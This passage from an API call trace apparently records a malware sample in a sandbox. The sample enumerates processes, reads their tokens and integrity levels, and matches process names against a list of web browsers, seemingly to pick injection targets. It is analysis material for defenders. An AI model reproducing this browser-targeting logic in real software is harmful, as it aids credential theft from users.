[0222.744] GetLastError () returned 0x7a [0222.744] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0222.744] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0222.744] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0222.744] CloseHandle (hObject=0x590) returned 1 [0222.744] CloseHandle (hObject=0x584) returned 1 [0222.744] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0222.744] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0222.744] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0222.744] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0222.744] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0222.744] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0222.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0x584 [0222.744] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0222.744] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0222.744] GetLastError () returned 0x7a [0222.744] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0222.744] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0222.744] CloseHandle (hObject=0x590) returned 1 [0222.744] CloseHandle (hObject=0x584) returned 1 [0222.744] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0x584 [0222.758] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e7818, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.758] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0222.758] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0222.758] GetLastError () returned 0x7a [0222.758] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0222.758] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0222.758] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0222.758] CloseHandle (hObject=0x590) returned 1 [0222.758] CloseHandle (hObject=0x584) returned 1 [0222.758] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0222.758] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0222.758] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0222.758] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0222.758] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0222.758] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0222.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0x584 [0222.758] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0222.758] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0222.758] GetLastError () returned 0x7a [0222.758] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0222.758] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0222.758] CloseHandle (hObject=0x590) returned 1 [0222.758] CloseHandle (hObject=0x584) returned 1 [0222.758] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0x584 [0222.758] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e7938, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.758] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0222.758] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0222.758] GetLastError () returned 0x7a [0222.758] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0222.758] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0222.758] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0222.758] CloseHandle (hObject=0x590) returned 1 [0222.758] CloseHandle (hObject=0x584) returned 1 [0222.759] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0222.759] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0222.759] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0222.759] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0222.759] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0222.759] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0222.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0x584 [0222.759] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0222.759] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0222.759] GetLastError () returned 0x7a [0222.759] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0222.759] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0222.759] CloseHandle (hObject=0x590) returned 1 [0222.759] CloseHandle (hObject=0x584) returned 1 [0222.759] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0x584 [0222.759] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e7a70, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.759] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0222.759] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0222.759] GetLastError () returned 0x7a [0222.759] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0222.759] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0222.759] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0222.759] CloseHandle (hObject=0x590) returned 1 [0222.759] CloseHandle (hObject=0x584) returned 1 [0222.759] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0222.759] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0222.759] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0222.759] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0222.760] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0222.760] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0222.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0x584 [0222.760] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0222.760] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0222.760] GetLastError () returned 0x7a [0222.760] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0222.760] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0222.760] CloseHandle (hObject=0x590) returned 1 [0222.760] CloseHandle (hObject=0x584) returned 1 [0222.760] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0x584 [0222.760] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e7b90, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.760] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0222.760] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0222.760] GetLastError () returned 0x7a [0222.760] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0222.760] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0222.760] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0222.760] CloseHandle (hObject=0x590) returned 1 [0222.760] CloseHandle (hObject=0x584) returned 1 [0222.760] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0222.760] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0222.760] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0222.760] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0222.760] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0222.760] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0222.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0x584 [0222.760] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0222.760] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0222.760] GetLastError () returned 0x7a [0222.760] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0222.760] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0222.760] CloseHandle (hObject=0x590) returned 1 [0222.760] CloseHandle (hObject=0x584) returned 1 [0222.760] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0x584 [0222.761] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e7cd0, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.761] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0222.761] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0222.761] GetLastError () returned 0x7a [0222.761] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0222.761] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0222.761] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0222.761] CloseHandle (hObject=0x590) returned 1 [0222.761] CloseHandle (hObject=0x584) returned 1 [0222.761] lstrcmpiW (lpString1="firefox.exe", lpString2="WINWORD.EXE") returned -1 [0222.761] lstrcmpiW (lpString1="chrome.exe", lpString2="WINWORD.EXE") returned -1 [0222.761] lstrcmpiW (lpString1="opera.exe", lpString2="WINWORD.EXE") returned -1 [0222.761] lstrcmpiW (lpString1="iexplore.exe", lpString2="WINWORD.EXE") returned -1 [0222.761] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="WINWORD.EXE") returned -1 [0222.761] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="WINWORD.EXE") returned -1 [0222.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0222.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0222.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0222.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0222.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0222.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5fc) returned 0x584 [0222.761] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0222.761] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0222.761] GetLastError () returned 0x7a [0222.761] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0222.761] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0222.761] CloseHandle (hObject=0x590) returned 1 [0222.761] CloseHandle (hObject=0x584) returned 1 [0222.761] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5fc) returned 0x584 [0222.761] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e8268, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.761] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0222.761] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0222.761] GetLastError () returned 0x7a [0222.761] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0222.761] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0222.761] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0222.761] CloseHandle (hObject=0x590) returned 1 [0222.761] CloseHandle (hObject=0x584) returned 1 [0222.762] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0222.762] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0222.762] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0222.762] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0222.762] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0222.762] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0222.762] VirtualFree (lpAddress=0x2e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0222.762] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0224.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0xfcfadc | out: SystemInformation=0x0, ResultLength=0xfcfadc*=0xc0f0) returned 0xc0000004 [0224.788] VirtualAlloc (lpAddress=0x0, dwSize=0xd0f0, flAllocationType=0x1000, flProtect=0x4) returned 0x2e0000 [0224.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0xd0f0, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0224.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0224.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0224.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0224.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0224.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0224.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0224.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0224.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0224.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0224.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0224.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0224.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0224.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0224.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0224.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0224.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0224.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0224.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0224.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0224.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0224.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0224.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0x584 [0224.792] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0224.792] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0224.792] GetLastError () returned 0x7a [0224.793] GetTokenInformation (in: TokenHandle=0x590, 